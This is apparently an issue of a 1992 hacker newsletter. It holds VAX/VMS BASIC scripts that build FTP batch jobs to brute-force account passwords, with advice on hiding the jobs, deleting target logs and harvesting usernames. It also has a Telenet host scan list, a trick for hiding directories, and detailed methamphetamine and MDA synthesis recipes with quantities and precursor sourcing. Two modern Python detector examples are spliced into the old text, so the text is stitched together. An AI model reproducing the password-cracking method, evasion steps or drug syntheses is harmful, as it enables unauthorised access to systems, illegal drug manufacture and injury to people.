Week : $65.00
Month : $260.00
Year : $3120.00
With this in effect, lets say you can operate 5 Boxes
max, safely and effectively. Lets average that....
Week : $325.00
Month : $1300.00
Year : $15,600.00
Which is, of course, tax free. This should be efficent
to keep up with most of your bills and whatnot. With a
real job, you could make real money! Or, if you are
unlike me, collect welfair and live like a king! Welp
there you go!
<P.S. - Don't take this text TO literally!>
---==<Beaver>==---
Idea conceived by SAOO members - The Beaver, Shadow Hacker,
Abigail, Dementia Meister and Section 8.
Thought up just before before getting rid of a beat up
box and hacking on machines at Utaha and Miami Fl.
<July 24, 1992>
______________________________________________________________
The VAX/VMS FTP Batch Hack.
Written By The Beaver
________________________________________________
When I came up with this method about a year and a half ago, I never
knew how well it would work out for me. I have cracked more accounts using
this method than I can possibly think of. In order to use this method, one
must have some sort of programming knowledge and understand, at least somewhat,
how VMS works.
First off, let me briefly explain the method before we actually go
into coding or anything like that. FTP <File Transfer Protocol> is used as
a file transfer method from one machine to another. What really makes this
great is that any machine that supports FTP can be hacked using this method.
This means that you can use your hacked VMS system to hack any other
system that supports FTP that runs any OS! Here's how the idea came to me. One
night, I was hacking on a VMS system somewhere on the Internet, and I
remembered that every time you fail an account, the user is notified that there
was an invalid login attempt, and if you have too many invalid attempts in a
given time, bells and whistles go off, telling the operator that a "breakin"
is in progress. This can be a real bummer.
Well I got to thinking that this "front door" hacking was really becoming
a drag, then it dawned on me. No logs or records of invalid attempts are
recorded <At least to my knowledge> by FTP, which you have to "login" to send
files to the remote machines! Now I'm set. I'm hacking like hell, then another
idea "spawn's" on me.
What if I upload a ton of commonly used passwords, write a program that
will create a batch job that will attempt all the passwords on the accounts
that I was hacking. Then I could "submit it" and let it hack for me? Trust
me, it worked like a dream.
From that, I came up with tons of variations of the program. Well,
let's get started with the technical info.
All the code was written under VMS BASIC, because everybody and their
grandmothers <The ones who hack> knows BASIC. The first example is a hack
over internet on a single account with a password list.
<Title: One User, Multiple Passwords>
5 on error goto 50 ! This will Catch EOF
10 user$="bob" ! This is ther username
open "passwords.dat" for input as#2 ! Open File w/ Favorite Passwds
open "hack.bat" for output as#1 ! Our Batch That Will Hack.
10 input#2, pass$ ! Grab A Password
20 print#1,"$ ftp <Target Address> /user="+username$+" /pass="+pass$
30 print#2,"quit" ! Where Tried Our Password, Now Quit.
40 goto 20 ! Do It All Over Again.
50 resume 51
51 close#1 ! Got The EOF, now close
close#2 ! up and exit.
end
That simple. We now have a file called "hack.bat", which will do our
hacking for us. Ok, so we are ready to kick it off. Type the following.
Submit hack.bat /noprint / notify
Now, let me explain a little more. In line 20, where we FTP to the
desired address, you must keep the "$" in there. If it is removed, the
Batch job will not work correctly. This tells the VAX that this is a DCL
level command, so it must stay. There is none in front of the "quit", because
by then, we are not at DCL, but rather, we are using the FTP program.
Here's something very important to remember also. When you "submit"
the batch job, make sure the "/noprint" is present! This tells the system
NOT to dump batch information to the printer. If you don't do this, everyone
in the computer center will see what you are up to! That ain't cool!
The "/notify" is optional. This will simply tell you when your
batch job has completed.
Now, while it's doing its thing, go off and do something else for
a while <I.E. Setup another one, eat, sleep for a change>. Okay, the batch
job completes, now you want to extract all the cool information. You will
notice that there is a big, fat log called "hack.log". This is a record
of everything that happened in our batch job. Now we check to see if we
got in or not. This part you might have to play with. I use the VMS "search"
command at this point, like thus........
Search hack.log logged
This will search the entire log for the word "logged". So if it finds
one, it will display the line that had that word. What we are looking for is
the nice key words "logged in". From here it will dump to you whether you
succeeded in logging in or not. One problem, it will only show that line, so
you might have to whip up another BASIC program that will search for all the
important lines that contain the information you want <I.E. - THE PASSWORD!>.
There ya have it! Possible hours of work all nicely automated for ya!
The only problem? There will be an FTP log stored in the target's directory.
No big deal, you have their password, go over and delete it.
The following is more code, with a brief description of what it does.
All "submits" should be done like before.
<Title: The Gobber Scan>
5 on error goto 100 ! Catch That Thare EOF
10 open "usernames" for input as#1 ! Open A List Of Usernames
open "hack.bat" for output as#2 ! Opens Our Work Horse
20 input#1,user$ ! Get a Username
30 print#2,"$ ftp <Target Address> /user="+user$+" /pass="+user$
40 print#2,"quit" ! Try Then Quit FTP
50 goto 20
100 resume 111
111 close#1 ! Got The EOF, Now
112 close#2 ! Close Up The Files
113 end
This is the one I find that is most successful! It tries the person's
username as a password. This works real nice on VAX/VMS systems, because
VMS accounts usually default their passwords to the username! In one case,
using this method, I cracked 166 accounts on a system in Utah! No shit!
<Title: Multiple Usernames, Multiple Passwords>
5 on error goto 200 ! Handles Them EOF's
10 open "username.dat" for input as#1 ! Opens Username File
open "password.dat" for input as#2 ! Opens Password File
open "hack.bat" for output as#3 ! Our Electro-Hacker Hero
20 flag=1 ! Determines Who Got The
input#1,user$ ! EOF
30 flag=2 ! Determines Who Got The
input#2,pass$ ! EOF
40 input#3,"$ ftp <target address> /user="+user$+" /pass="+pass$
print#3,"quit" ! Try and exit
50 goto 30
200 resume 210
210 if flag=2 then ! If At The End Of Pass
close#2 ! File, Close It, Get
open "password.dat" for input as#2 ! Another User And
goto 20 ! Start Over
220 if flag=1 then ! If At The End A User
close#1 ! File, Close And Exit.
close#2
close#3
end
Okay, that should pretty much cover your needs. There are only
a few drawbacks to FTP Batch Hacker. It sometimes requires a bit of disk
space, so if you have a disk quota of a hundred blocks, forget about it.
I would also like to say that when you actually use this
method, it would be very wise to change the names for the files used by the
programs above. After all, it don't look too cool to have "passhacker.bat" in
the queue for all to see! Yesh!
Before I end this article, I would like to include one more detail
that works really nice with this method. Let's say you're on this really nice
VAX/VMS and ya want to keep your access there as long as possible. What you
need is as many accounts as possible. Here's what I do, type the following
at DCL........
Type sys$common:[sysexe]rightslist.dat
This will dump all usernames <And group names too> along with a lot of
random <well, random to us> ctrl characters. Capture this, and write a filter
and re-upload the nice clean userlist. After that, run one of these guys with
the users you got and I can almost bet ya that you will get at least a few
accounts.
This works really great when you use the DECNET to jump on other
systems that are a part of the network! You can sometimes
crack open an entire cluster <Or two, three, four, etc, etc!>.
Well, that's all there is to it. That simple and fun. Also, if anyone
writes a good filter for rightslist ON a VMS system, I would very much like
to see your code, because I have had one hell of a time getting one to
work myself.......
Note: After producing this article, I found out why the FTP never makes logs
of invalid attempts. The reason is because most of the time
the people who have set up the system have not gone through all the
security means to keep stuff like this from happening. Not to worry
though. I have only seen one system out of about 100 that actually
had their FTP server set up right. The reason that they had it set up
right was because they were FTP hacked so many times by fellow SAOO
members, that they figured it out. Those people are at FSU, so don't
hack on 'em or use this method on 'em. They got enough problems as it
is.
If you do not wish to write your own Rightslist filter, there are
a ton of RL filters written by SAOO members. They are Phill <any version
higher than 1.0 for speed>, written by Dementia Meister and Abigail
Natias, and also RIF <For VAX/VMS, and by far the quickest because
you never need to download the RL file, because it filters it
online>, which is written in C. Created by Laiazon and Tech advisor -
The Beaver.
<Phill was also included with this issue of Critical Mass!>
<C>1992 ---==<Beaver>==---
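What the one correctly configured site in the note above gains from logging FTP login results: the three batch patterns in this article (one user with many passwords, many users with one guess each, and a success that follows a burst) each leave a distinct trace. This is an added example, not code from the newsletter; the log line format, thresholds, addresses and sample lines are constructed assumptions, not the output of any particular FTP server.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (an assumption for this example):
#   1992-03-26 02:00:01 FTP LOGIN FAILED user=bob src=192.0.2.10
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) FTP LOGIN "
    r"(?P<result>OK|FAILED) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line):
    """Return (timestamp, result, user, src) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
    return ts, m["result"], m["user"].lower(), m["src"]


def detect(lines, window=timedelta(minutes=5), max_failures=5, max_users=4):
    """Return ordered alerts (kind, src, user) from a chronological log."""
    recent = defaultdict(deque)   # src -> failures still inside the sliding window
    flagged = set()               # sources that have already raised an alert
    alerts = []

    def alert(kind, src, user):
        entry = (kind, src, user)
        if entry not in alerts:
            alerts.append(entry)
        flagged.add(src)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        q = recent[src]
        while q and ts - q[0][0] > window:
            q.popleft()                       # forget failures older than the window
        if result == "FAILED":
            q.append((ts, user))
            if sum(1 for _, u in q if u == user) >= max_failures:
                alert("password-guessing", src, user)   # one account, many passwords
            if len({u for _, u in q}) >= max_users:
                alert("username-sweep", src, None)      # many accounts, few guesses each
        elif src in flagged and q:
            # A login that succeeds right after a burst: reset this account first.
            alert("success-after-failures", src, user)
    return alerts


SAMPLE_LOG = [  # constructed sample lines
    "1992-03-26 02:00:01 FTP LOGIN FAILED user=bob src=192.0.2.10",
    "1992-03-26 02:00:03 FTP LOGIN FAILED user=bob src=192.0.2.10",
    "1992-03-26 02:00:05 FTP LOGIN FAILED user=bob src=192.0.2.10",
    "1992-03-26 02:00:07 FTP LOGIN FAILED user=bob src=192.0.2.10",
    "1992-03-26 02:00:09 FTP LOGIN FAILED user=bob src=192.0.2.10",
    "1992-03-26 02:00:11 FTP LOGIN FAILED user=bob src=192.0.2.10",
    "1992-03-26 02:10:00 FTP LOGIN FAILED user=gina src=198.51.100.3",
    "1992-03-26 02:10:20 FTP LOGIN OK user=gina src=198.51.100.3",
    "1992-03-26 02:30:00 FTP LOGIN FAILED user=alice src=192.0.2.77",
    "1992-03-26 02:30:02 FTP LOGIN FAILED user=carol src=192.0.2.77",
    "1992-03-26 02:30:04 FTP LOGIN FAILED user=dave src=192.0.2.77",
    "1992-03-26 02:30:06 FTP LOGIN FAILED user=erin src=192.0.2.77",
    "1992-03-26 02:30:08 FTP LOGIN OK user=frank src=192.0.2.77",
    "unparseable line that the detector skips",
]

if __name__ == "__main__":
    for kind, src, user in detect(SAMPLE_LOG):
        print(kind, src, user or "-")
```

The single mistyped password from 198.51.100.3 raises nothing, while the sweep from 192.0.2.77 also names the account that was actually opened.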
______________________________________________
l l
l Generic SAOO Telenet Directory l
l Part II l
l Scanned By The Beaver l
l____________________________________________l
Information on Telenet:
The first thing you need to do is obtain a dialup list. To do
this, call 1-800-424-9494 <1200 7E1, or 1200 8N1 with high bit
stripping on>. Once on, you will receive a "TERMINAL=", which at
this point, enter your terminal type, or just press return <TTY>.
You will now get a "@" prompt. From here type "c mail". At
the "Username?" prompt, enter "phones" and the same for the
"Password?" prompt. At this point, simply follow the directions,
and you will get your local dialup<s>. One thing I would like to
note, when using the 300/1200 dialups, when you connect, simply hit
return a few times. When using the 2400 dialups, you must enter "@"
followed by a carriage return.
For more information on Telenet, I advise you to get
Hacker's Unlimited issue#1 or LOD/H Technical Journal.
I did not wish to make this a text file on
Telenet, but rather a directory of listings scanned by myself and
fellow S.A.O.O members.
The "area" that is implied in this list basically means that it is the
overall area that was covered. Just because a machine was found in a scan
in a specific area does not always mean it IS in that area. At the bottom
of the list for "interconnecting" hosts.
Part I consisted of the New York and half the Washington D.C.
area. In this issue is the rest of the D.C. along with 904,
305 and the 404. Please enjoy.
Prefix: 904 <North Florida Area> Scanned: 0-999
Suffix Information O/S
------ -------------------------------------------------------------- ----
163 - Refuse Collect Calls
231 - Refuse Collect Calls
236 - Refuse Collect Calls
237 - Refuse Collect Calls
Prefix: 305 <South Florida Area> Scanned: 0-999
Suffix Information O/S
------ -------------------------------------------------------------- ----
004 - Martin Marietta - SIM3278
022 - INH6.NET.FDP <404 60033>
034 - Martin Marietta Proprietary Network VM
035 - "ENTER SWITCH CHARACTERS" Unknown
059 - ".INVALID COMMAND", VTAM?
105 - Refuse Collect Calls
106 - Refuse Collect Calls
120 - Refuse Collect Calls
121 - Refuse Collect Calls
122 - Refuse Collect Calls
130 - Unknown
135 - Refuse Collect Calls
136 - INH6.NET.FDP <404 60033>
140 - ".INVALID COMMAND" , VTAM?
141 - "Select Desired System:" Server
142 - Telenet PAD
145 - Telenet PAD
149 - S901.net.buc
150 - Refuse Collect Calls
156 - Telenet PAD
162 - Unknown
170 - Refuse Collect Calls
171 - "ENTER SWITCH CHARACTERS"
172 - Unknown
175 - Telenet PAD
177 - Unknown
178 - s901.net.bus
237 - Comcast Information Service VM
241 - Unknown
245 - Refuse Collect Calls
247 - "SEND" Unknown
250 - "aci login:" Unix.
253 - "PACKET/74" SNA, must be IBM
254 - "PACKET/74"
339 - "PACKET/74"
342 - Refuse Collect Calls
347 - "PACKET/74"
362 - Clarion Software On-line Info. Service, type "new" for new user
363 - Clarion Software
364 - Clarion Software
365 - Clarion Software
366 - Clarion Software
370 - Refuse Collect Calls
371 - VAX/VMS in Another Laug! VAX/VMS
372 - Refuse Collect Calls
438 - Refuse Collect Calls
461 - Refuse Collect Calls
463 - Martin Marietta VM
464 - Refuse Collect Calls
465 - Unknown
467 - HP Unix
471 - Unknown
472 - Refuse Collect Calls
566 - Busy At Scan
567 - Busy At Scan
644 - ".INVALID COMMAND"
645 - ".INVALD COMMAND"
Interconnection:
[305136 - 404 60033]
Prefix: 202 <Washington D.C Area> Scanned: 400-999 <See CM#6 for 0-400>
Suffix Information O/S
------ -------------------------------------------------------------- ----
403 - Refuse Collect Calls
433 - Refuse Collect Calls
447 - Access Not Allowed From PAD
448 - Access Not Allowed From PAD
449 - Access Not Allowed From PAD
453 - Telenet PAD
454 - VAX/VMS GBS VAX/VMS
455 - Refuse Collect Calls
456 - Refuse Collect Calls
458 - Refuse Collect Calls
459 - Refuse Collect Calls
462 - Access Not Allowed From PAD
463 - Access Not Allowed From PAD
465 - Refuse Collect Calls
466 - Refuse Collect Calls
467 - Refuse Collect Calls
468 - Refuse Collect Calls
469 - Refuse Collect Calls
472 - Refuse Collect Calls
473 - Access Not Allowed From PAD
474 - Access Not Allowed From PAD
475 - Access Not Allowed From PAD
477 - "UPI>" Unknown
478 - "UPI>" Unknown
479 - "UPI>" Unknown
550 - "UPI>" Unknown
555 - Access Not Allowed From PAD
616 - Refuse Collect Calls
617 - Refuse Collect Calls
652 - Refuse Collect Calls
653 - Refuse Collect Calls
654 - Refuse Collect Calls
810 - Telenet Async to 3270
Prefix: 404 <North Georgia Area> Scanned: 0-999
Suffix Information O/S
------ --------------------------------------------------------------- ----
005 - Connects/disconnects with no disconnect msg
022 - Refuse Collect Calls
029 - Telenet PAD?
053 - VTAM Server
057 - Unknown
059 - Unknown
070 - Unknown
077 - Unknown
079 - Unknown
113 - Refuse Collect Calls
114 - Refuse Collect Calls
124 - Access Not Allowed From PAD
127 - Access Not Allowed From PAD
128 - Access Not Allowed From PAD
140 - Access Not Allowed From PAD
141 - Access Not Allowed From PAD
142 - Access Not Allowed From PAD
143 - Unknown
161 - Connect/disconnects
162 - Connect/disconnects
168 - Unknown
171 - "OK" Unknown
244 - Connect/disconnects
247 - Unknown
277 - Connect/disconnects
343 - Access Not Allowed From PAD
344 - Access Not Allowed From PAD
349 - Primenet
351 - Unknown VAX/VMS
352 - Unknown VAX/VMS
358 - "Please login to network U:"
359 - "Please login to network U"
362 - Access Not Allowed From PAD
372 - System/88
373 - System/88
374 - Refuse Collect Calls
375 - "Please login to network U:"
532 - Refuse Collect Calls
556 - Refuse Collect Calls
557 - Refuse Collect Calls
558 - Refuse Collect Calls
559 - Refuse Collect Calls
560 - Unknown VAX/VMS
633 - Unknown VAX/VMS
635 - Unknown VAX/VMS
60033 - INH6.NET.FDP
---------------------------------------------
Hiding Directories
By Dementia Meister
----------------------------------
Here is how to really hide directories. First off, you need a HEX-Editor,
like DISKEDIT.EXE from Norton Utilities v6.01 (the one I recommend). Then
you need a directory that you want to hide. Warning: Play/test this
method out on a floppy first so you do not screw up your HD. I have lost
a lot of data (my fault, by lack of knowledge). This method is relatively
safe as long as you do not calibrate, speedisk, etc. your HD. Well, back
to the task at hand: go into the HEX-Editor and find your DIR. Now this
is the tricky part. Go to the DIR name and change it to an ext. only,
plus add the HIDDEN attribute to it. Now almost nothing can find your
DIR, not NCD, not DOS, not anything BUT a HEX-Editor that you manually
go and find it with. To UNHIDE the DIR, you go into the HEX-Editor, find the
DIR, change it to a legitimate name and wall-la<GRIN> you have it.
ThanX from the EDITOR of this INFO.
-=[ ]). |\|\. ]=-
(Dementia Meister)
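For someone examining a disk, the directory altered this way is still a normal 32-byte FAT directory entry, so a scan of the raw directory sectors finds it without going through DOS name handling. This is an added example, not code from the newsletter; the entry layout is the standard FAT one, the sample directory bytes are constructed, and "ext. only" is assumed to mean an all-space base name with a non-blank extension.

```python
import struct

ENTRY_SIZE = 32
ATTR_HIDDEN = 0x02
ATTR_VOLUME = 0x08
ATTR_DIR = 0x10
ATTR_LFN = 0x0F   # long-file-name entries on later VFAT volumes


def parse_entries(raw):
    """Yield one dict per in-use 8.3 entry found in raw directory bytes."""
    for off in range(0, len(raw) - ENTRY_SIZE + 1, ENTRY_SIZE):
        entry = raw[off:off + ENTRY_SIZE]
        if entry[0] == 0x00:
            break                      # end-of-directory marker
        if entry[0] == 0xE5:
            continue                   # deleted entry
        attr = entry[11]
        if (attr & 0x3F) == ATTR_LFN:
            continue                   # long-name fragment, not an 8.3 entry
        cluster, size = struct.unpack_from("<HI", entry, 26)
        yield {"offset": off, "name": entry[0:8], "ext": entry[8:11],
               "attr": attr, "cluster": cluster, "size": size}


def display_name(entry):
    base = entry["name"].rstrip(b" ").decode("ascii", "replace")
    ext = entry["ext"].rstrip(b" ").decode("ascii", "replace")
    return base + ("." + ext if ext else "")


def find_suspicious(raw):
    """Return [(offset, shown_name, reasons)] for entries worth a manual look."""
    findings = []
    for e in parse_entries(raw):
        if e["attr"] & ATTR_VOLUME or e["name"].startswith(b"."):
            continue                   # volume label, "." and ".." are normal
        reasons = []
        if not e["name"].strip() and e["ext"].strip():
            reasons.append("blank base name")
        if e["attr"] & ATTR_DIR and e["attr"] & ATTR_HIDDEN:
            reasons.append("hidden directory")
        if reasons:
            findings.append((e["offset"], display_name(e), reasons))
    return findings


def make_entry(name, ext, attr, cluster=0, size=0):
    """Build one constructed directory entry for the sample below."""
    return struct.pack("<8s3sB10sHHHI", name.ljust(8), ext.ljust(3), attr,
                       b"\x00" * 10, 0, 0, cluster, size)


# Constructed sample directory: two normal entries, one deleted entry, the
# altered directory, an ordinary hidden directory, the end marker, and stale
# bytes after the marker that must not be reported.
SAMPLE_DIR = b"".join([
    make_entry(b"COMMAND", b"COM", 0x20, 2, 47845),
    make_entry(b"GAMES", b"", ATTR_DIR, 30),
    b"\xE5" + make_entry(b"OLDFILE", b"TXT", 0x20)[1:],
    make_entry(b"", b"SYS", ATTR_DIR | ATTR_HIDDEN, 57),
    make_entry(b"SECRET", b"", ATTR_DIR | ATTR_HIDDEN, 91),
    bytes(ENTRY_SIZE),
    make_entry(b"", b"OLD", ATTR_DIR | ATTR_HIDDEN, 5),
])

if __name__ == "__main__":
    for offset, name, reasons in find_suspicious(SAMPLE_DIR):
        print("offset %4d  %-12s %s" % (offset, name, ", ".join(reasons)))
```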
Welcome to Down and Dirty Chemistry 101
This file is for those who wish to make drugs in thier own home, to sell
or just to take. Unlike most how to files on dope manufacture, this one is
for people who are more worried about getting dope made than getting it 100%
pure and of pharmacutical quality. These methods are the quickest and most
simple around. You don't need a PhD. to make these compounds, but a little
knowledge of chemistry is a must.
* DISCLAIMER *
This where most people leave a message about how the file is for informa-
tional use only. BULLSHIT, if you are old enough to make these drugs then you
are old enough to decide for yourself if you want to take them or not. I say
go right ahead, make 'em then take 'em. Yea it's illegal, so BE CAREFUL, but
if you aren't going to use this file then why keep it? pass it on to someone
who will, and scam some of thier first batch as an info retrieval fee.
TYRAMINE
Tyramine is a fairly potent stimulant that is found naturally in cheese.
Don't even t
hink about extracting it. It is easily made from the amino acid
tyrosine by decarboxilating it. Tyrosine is rather carefully watched by the
DEA, so don't buy it from a chem. supply comany, no matter how much cheaper
it is there. It is available as the free form amino acid from most any health
food store.
To decarboxilate the tyrosine at home, simply heat it with barium hydroxide
and seperate tyramine from the solution. Tyramine and tyrosine are both only
slighty soluble in water, so filtering with hot water should remove most of
the impurities and leave you with tyramine and unreacted tyrosine. The entire
synthesis could take place in a coffee pot.
* MUSCIMOLE *
This is another drug with a synthesis so easy, it is funny. It is the
active compound in many old world mushrooms, and may well be the first drug
that early man tripped on. I have never tried it, but I heard that it can
cause a few unpleasent effects (muscle twitching, dizziness). It is still
legal in some states and ibotenic acid is fairly sfe to order from a supply
company.
To make muscimole, reflux ibotenic acid in 10 times it's weight of water.
* METHAMPHETAMINE *
Crank, crystal meth, wire: all words known and loved by speed freaks around
the world. This is the mother of all amphetamines, a small line will wire you
for 12 hours. There are many ways to go about making crank, if you have
access to an organic chemistry lab. For those who don't, this may be the
simplest approach. This method uses ephedrine as the main precurser because
it is very similar in structure to crank. Look them both up and see.
All you need to do is replace an OH group with a hydrogen atom.............
No Problem. Ephedrine is available from suppliers in the back of magazines
(Penthouse, Cosmopoliton) for about $20 for 1,000 25mg tablets, just extract
the pure ephedrine out.
Put a 2 liter flask into an ice bath with a stirrer in one neck and at
least one neck to pour chemicals into. Add 360 ml chloroform, then 360 g of
phosphorus pentachloride and stir for 1/2 hour. Then add 240 g of ephedrine
hydrochloride over 45 minutes, put in 60 ml more chloroform, and stir for 2
hours. Let the brew stand in ice for 45 min. and decant the juice off, DON'T
let the left over PCl5 come over, filter if any does. Add mineral spirits
until the total volume is 4 liters, then let the chlorephedrine crystalize
in the freezer for an hour. Filter and dry your crystals.
To make methamphetamine from chlorephadrine you must replace the Cl atom
with a hydrogen. There are many catalysts that will work, zinc is cheap and
easy to get, but gives a rather low yield of speed. Palladium is probably the
best way to go.
Take a champagne bottle, 2L is a good size, and wrap it in duct tape to be
safe. Add 50g anhydrous sodium acetate and 700ml of distilled water. Make a
buffer solution by adding acetic acid until the pH is 7. Add 2g of palladium
, either on charcoal or barium sulfate, then 125g of chlorephadrine. Attach
a cylender of H gas and increase to 30lbs pressure. Keep this pressure up
for several hours, until H stops being absorbed. Stir with magnetic stirer
or if need be just shake it regularly over the whole time.
Decant off the liquid and filter to remove the catalyst. make the solution
strongly basic (pH 10-11) with NaOH and shake like hell for about 5 min.
Extract with Benzene and discard the water layer. Fractional distillation
is required to seperate the chorephadrine from the meth, the meth comes over
first followed immediatly by chlorephadrine.
Palladium black on charcoal is on the DEA watched chemical list, be careful
obtaining it. The Merk index should have a formula for making it. If you go
with the zinc use about twice as many moles as you would with palladium.
*MDA*
Ahh, the origional love drug! This is essentially the same as XTC, but as
it is easier to make and stronger I will give this formula instead.
Safrole is the main precurser and can be obtained in sasafrass oil which
is available at any store that sells herbs, it is about 80% safrole by volume
and pure safrole can be distilled from the oil under a vacuum. When the
distillate appears to be a homogenious oil, collect it in a clean flask, this
is safrole.
In a glass vessel, in an ice bath, slowly add 450g concentrated sulfuric
acid to 400g acetonitrile. Keep the temperature under 10 degrees C while
making the addition. Take the mixture out of the ice bath and add 236g safrole
Stir occasionally and watch the temperature. When the solution reaches 80 deg.
C put the flask back in the ice bath and then pour into a gallon of ice water
with 18 oz NaOH in it. Stir while pouring.
Decante the yellow oily layer on top into another flask. Add 10 times the
volume of 10% KOH in 190 proof vodka. Reflux for 6 hours. Boil away most of
the alcohol under a vacuum. Add water to dissolve the KOH and extract your
dope with benzene. Distill under a vacuum and collect the fraction coming
over at about 125 deg. C (at about 20 torr). Crystallize in your freezer, and
filter. Dry the crystals. One "hit" is about 100mg.
This is all the space and time I have to write. Expect D$DChem II in the
next issue of Critical Mass. If you have any questions or comments you can
reach me on any SAOO support bbs. Address mail to Art Phish. I would be happy
to include any synthesis that is requested in the next issue.
Art Phish
_________________________________________
Closing Notes
__________________________
Welp, that concludes yet another fine issue of Critical Mass. In
issue number 8, prepare yourself for the following......
SAOO Telenet Directory Part III
Hacking The Department Of Motor Vec.
More Chemistry, from Art Phish
Probably an article on Telenet considering the recent questions
I have received.
And much, much more! If you would like to be involved in a
computer conference, please leave The Beaver Email at one of the
locations given at the beginning of this issue of Critical Mass.
Until the next issue, chow... And Happy, Safe! hack'in.
If you have any article pertaining to not so often
talked about subjects, please E-mail the Beaver. Also, after
the writing of "How to take DEC Servers Off the air", there
seemed to be the misconception on why the article was produced.
It seems that some people believed that the article was put
out because I am "a bad person whom only likes destroying data".
This is a pretty far fetched thing to say. Shortly after the
article's release, I heard that a friend of mine at DOR <Dept.
of Revenue> read that part and then secured their server more.
That, my friend, was the purpose of the article. To get information
out there, among the people. Till the next CM, I guess I will
be seeing ya on the nets.... Chow!
---==<Beaver>==---
Member S.A.O.O.